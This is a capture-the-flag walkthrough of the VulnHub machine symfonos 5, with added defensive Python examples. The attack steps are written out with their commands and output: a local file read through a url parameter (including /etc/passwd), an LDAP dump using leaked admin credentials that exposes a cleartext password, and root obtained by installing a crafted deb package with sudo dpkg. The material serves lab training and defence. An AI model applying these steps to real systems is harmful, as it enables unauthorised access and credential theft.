VulnHub symfonos5 walkthrough

Name: symfonos: 5
Date release: 7 Jan 2020
IP: 192.168.31.65

Ports

root@kali:~# nmap 192.168.31.65 -p- --ope
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:12 HKT
Nmap scan report for 192.168.31.65
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap
636/tcp open  ldapssl
MAC Address: 00:0C:29:CE:78:46 (VMware)

Directory scan on port 80

Visiting /home.php redirects automatically; inspecting the response in Burp reveals /home.php?url=http://127.0.0.1/portraits.php.

After /home.php?url=file:///etc/passwd succeeded, I kept trying to read files with file:/// and kept getting stuck, until a colleague told me the files can be read just as well without file://.

So don't be too quick to decide that a given point must be one particular vulnerability, or you will get stuck in it; you need to step back and think differently.

Via /home.php?url=home.php the source turns out to be:

<?php
session_start();

if(!isset($_SESSION['loggedin'])){
   header("Location: admin.php");
}

if (!empty($_GET["url"]))
{
$r = $_GET["url"];
$result = file_get_contents($r);
}

?>
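The home.php source above has two defects worth naming: the redirect to admin.php is not followed by exit(), so the file read still executes for unauthenticated requests (which is why the content shows up in Burp's response), and file_get_contents() accepts any scheme or a bare relative path, so file:///etc/passwd and plain home.php both read local files. The following is an added example, written in Python rather than PHP and not code from the VM or the write-up, showing the fix a defender would apply: resolve a page name against a fixed allowlist instead of fetching a caller-supplied location. ALLOWED_PAGES, the page parameter name and the webroot are assumptions for illustration.

```python
"""Hardened replacement for the url parameter handling in home.php.

Added example (Python, not code from the symfonos 5 VM or the write-up).
home.php has two defects: header("Location: admin.php") is not followed by
exit(), so the file read still runs for unauthenticated requests, and
file_get_contents() accepts any scheme or a bare relative path, so both
file:///etc/passwd and plain home.php read local files.  The fix below
looks the page name up in a fixed allowlist instead of fetching a
caller-supplied location.  ALLOWED_PAGES and the webroot are assumptions.
"""
from pathlib import Path
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed allowlist: the only pages home.php is meant to include.
ALLOWED_PAGES = {
    "portraits": "portraits.php",
    "home": "home.php",
}

# Schemes file_get_contents() accepts that read local or wrapper-backed
# data; used only to label refused requests for logging.
LOCAL_READ_SCHEMES = {"file", "php", "data", "glob", "phar"}


def classify(url: str) -> str:
    """Label a raw url value the way the vulnerable page would have treated it."""
    scheme = urlsplit(url).scheme.lower()
    if scheme in LOCAL_READ_SCHEMES:
        return "local-read-scheme"
    if scheme in ("http", "https"):
        return "remote-fetch"  # SSRF: the server fetches on the caller's behalf
    if scheme == "":
        return "relative-path"  # file_get_contents("home.php") reads the local file
    return "other-scheme"


def resolve_page(page: str, webroot: str = "/var/www/html") -> Optional[Path]:
    """Map an allowlisted page name to its file; None for anything else.

    Lookup by key means schemes, separators, '..' and NUL bytes from the
    caller never reach the filesystem or a URL fetcher.
    """
    target = ALLOWED_PAGES.get(page)
    if target is None:
        return None
    return Path(webroot) / target


def handle_request(params: dict, logged_in: bool) -> Tuple[int, str]:
    """home.php's control flow with both defects fixed.

    Returns (status, location_or_body).  The redirect ends processing, and
    only allowlisted page names are resolved.
    """
    if not logged_in:
        return 302, "admin.php"
    page = params.get("page", "")
    path = resolve_page(page)
    if path is None:
        return 400, "refused page=" + repr(page) + " (" + classify(page) + ")"
    return 200, str(path)
```

The classify() labels are only there so a refused request can be logged with a reason; the security decision is the allowlist lookup, which never hands caller-controlled text to the filesystem or a fetcher.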

Now it's simple. Reading other files, admin.php turns out to contain the LDAP connection code, including the configuration.

Both ldapsearch (shipped with Kali) and nmap's ldap-search script can dump the directory; nmap's script is used here.

root@kali:~# nmap -p 389 192.168.31.65 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local",ldap.password="qMDdyZh3cT6eeAWD"'

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:09 HKT
Nmap scan report for 192.168.31.65
Host is up (0.00045s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=symfonos,dc=local
|     dn: dc=symfonos,dc=local
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: symfonos
|         dc: symfonos
|     dn: cn=admin,dc=symfonos,dc=local
|         objectClass: simpleSecurityObject
|         objectClass: organizationalRole
|         cn: admin
|         description: LDAP administrator
|         userPassword: {SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
|     dn: uid=zeus,dc=symfonos,dc=local
|         uid: zeus
|         cn: zeus
|         sn: 3
|         objectClass: top
|         objectClass: posixAccount
|         objectClass: inetOrgPerson
|         loginShell: /bin/bash
|         homeDirectory: /home/zeus
|         uidNumber: 14583102
|         gidNumber: 14564100
|         userPassword: cetkKf4wCuHC9FET
|         mail: zeus@symfonos.local
|_        gecos: Zeus User
MAC Address: 00:0C:29:CE:78:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

This gives the user zeus with password cetkKf4wCuHC9FET; SSH login succeeds.
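The two userPassword values in the dump above differ in the way that matters: admin's is an {SSHA} hash, zeus's is the cleartext password, which is what turned a directory read into an SSH login. The following is an added example, not part of the original write-up, that audits LDIF for password attributes stored without a hash scheme (or with a weak one). SAMPLE_LDIF is constructed from the two entries shown above; the weak-scheme list is an assumption for illustration.

```python
"""Audit LDAP entries for userPassword values stored without a hash scheme.

Added example, not part of the original write-up.  SAMPLE_LDIF is
constructed from the two entries in the ldap-search output above: the admin
entry carries an {SSHA} hash, while zeus's entry stores the password in
cleartext.
"""
import re

SAMPLE_LDIF = """\
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
cn: admin
userPassword: {SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm

dn: uid=zeus,dc=symfonos,dc=local
objectClass: posixAccount
uid: zeus
userPassword: cetkKf4wCuHC9FET
mail: zeus@symfonos.local
"""

# RFC 2307 style scheme prefix, e.g. {SSHA}, {CRYPT}, {ARGON2}.
SCHEME_RE = re.compile(r"^\{([A-Za-z0-9-]+)\}")
# Fail the audit for no scheme and for unsalted or broken digests (assumed list).
WEAK_SCHEMES = {"CLEARTEXT", "MD5", "SHA", "SMD5"}


def parse_ldif(text):
    """Minimal LDIF parser: list of {attribute(lowercase): [values]} dicts.

    Handles blank-line separated entries, comments and leading-space
    continuation lines; base64 ('::') and URL ('<') values are out of scope.
    """
    entries, current, last_attr = [], None, None
    for raw in text.splitlines():
        if not raw.strip():
            if current:
                entries.append(current)
            current, last_attr = None, None
            continue
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and current is not None and last_attr:
            current[last_attr][-1] += raw[1:]  # folded value continues
            continue
        attr, _, value = raw.partition(":")
        attr = attr.strip().lower()
        if current is None:
            current = {}
        current.setdefault(attr, []).append(value.strip())
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def password_scheme(value):
    """Scheme named in a userPassword value, or CLEARTEXT when there is none."""
    m = SCHEME_RE.match(value)
    return m.group(1).upper() if m else "CLEARTEXT"


def audit(text):
    """Return (dn, scheme) for each entry whose password storage is weak."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", ["<no dn>"])[0]
        for pw in entry.get("userpassword", []):
            scheme = password_scheme(pw)
            if scheme in WEAK_SCHEMES:
                findings.append((dn, scheme))
    return findings
```

Two fixes follow from the finding. The zeus entry should be rehashed (with OpenLDAP's ppolicy overlay or olcPasswordHash set, the server hashes on write). Separately, the web application should bind with a low-privilege service account rather than the directory administrator, and the userPassword attribute should be restricted with an access rule such as `to attrs=userPassword by self write by anonymous auth by * none`, so that a leaked bind credential cannot dump everyone's secrets.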

zeus@symfonos5:~$ whoami
zeus

zeus@symfonos5:~$ lastlog 
Username         Port     From             Latest
root             pts/0    192.168.65.128   Mon Jan  6 17:24:21 -0600 2020
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
nobody                                     **Never logged in**
_apt                                       **Never logged in**
systemd-timesync                           **Never logged in**
systemd-network                            **Never logged in**
systemd-resolve                            **Never logged in**
messagebus                                 **Never logged in**
sshd                                       **Never logged in**
zeus             pts/0    192.168.31.249   Sat Feb 15 00:35:36 -0600 2020
systemd-coredump                           **Never logged in**

Check the sudo rights

zeus@symfonos5:~$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg

dpkg is NOPASSWD, so let's see how to escalate privileges via dpkg.
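A NOPASSWD rule for a package manager is equivalent to NOPASSWD ALL, because dpkg runs package maintainer scripts as root during installation. The following is an added example, not part of the original write-up, that parses `sudo -l` output and flags such rules; SAMPLE_SUDO_L is copied from the session above, and HOOK_RUNNERS is an assumed list of package managers that execute packager-supplied scripts.

```python
"""Flag sudo rules that hand out root through package-manager hooks.

Added example, not part of the original write-up.  SAMPLE_SUDO_L is the
`sudo -l` output shown above.  Package managers run maintainer scripts as
root during installation, so a NOPASSWD rule for one of them is as
permissive as NOPASSWD ALL; the only remedy is to remove the rule.
"""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg
"""

# Binaries that execute packager-supplied scripts as the invoking user
# (root under sudo).  Assumed list for illustration; extend from an inventory.
HOOK_RUNNERS = {"dpkg", "apt", "apt-get", "rpm", "yum", "dnf"}

# "(runas) TAG: TAG: command, command" as printed by sudo -l.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return (runas, {tags}, [commands]) for each rule in the command section."""
    rules = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # everything before this is Defaults, not rules
            continue
        if not in_cmds:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append((m.group("runas").strip(), tags, cmds))
    return rules


def risky_rules(text):
    """Return (runas, command) pairs that run a hook runner as root without a password."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        runs_as_root = runas.split(":")[0].strip() in ("root", "ALL")
        if not runs_as_root or "NOPASSWD" not in tags:
            continue
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in HOOK_RUNNERS:
                findings.append((runas, cmd))
    return findings
```

Running risky_rules() over the target's output yields the single dpkg rule. Unlike a tool with a fixed argument list, dpkg -i cannot be made safe by restricting arguments in sudoers, since the package itself carries the code that runs; a scheduled job or a privileged deployment tool is the usual replacement.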

Install fpm locally, build a deb package, scp it to the target, and that's root.

root@kali:~# gem install --no-document fpm
...

root@kali:~# fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
root@kali:~# scp x_1.0_all.deb zeus@192.168.31.65:/home/zeus/
zeus@192.168.31.65's password: 
x_1.0_all.deb                                                        100% 1110     1.7MB/s   00:00 
zeus@symfonos5:~$ ls
ame_1.0_amd64.deb  x_1.0_all.deb

zeus@symfonos5:~$ sudo dpkg -i x_1.0_all.deb 
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# whoami
root
# 
